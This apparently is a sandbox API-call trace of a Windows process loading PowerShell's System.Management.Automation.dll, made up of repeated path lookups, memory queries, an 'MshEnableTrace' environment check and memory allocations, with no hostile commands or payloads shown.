	[0346.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0346.664] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.669] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0346.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.669] CoTaskMemFree (pv=0x467e50) 
	[0346.671] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.678] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0346.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.678] CoTaskMemFree (pv=0x467e50) 
	[0346.679] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0346.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.679] CoTaskMemFree (pv=0x467e50) 
	[0346.679] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0346.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.679] CoTaskMemFree (pv=0x467e50) 
	[0346.680] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0346.680] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.681] CoTaskMemFree (pv=0x467e50) 
	[0347.031] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0347.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.031] CoTaskMemFree (pv=0x467e50) 
	[0347.032] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0347.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.032] CoTaskMemFree (pv=0x467e50) 
	[0347.035] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.036] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.363] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.365] CoTaskMemAlloc (cb=0x104) returned 0x467e50
	[0347.365] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x467e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.366] CoTaskMemFree (pv=0x467e50) 
	[0347.720] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x468290
	[0347.722] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x4683a0
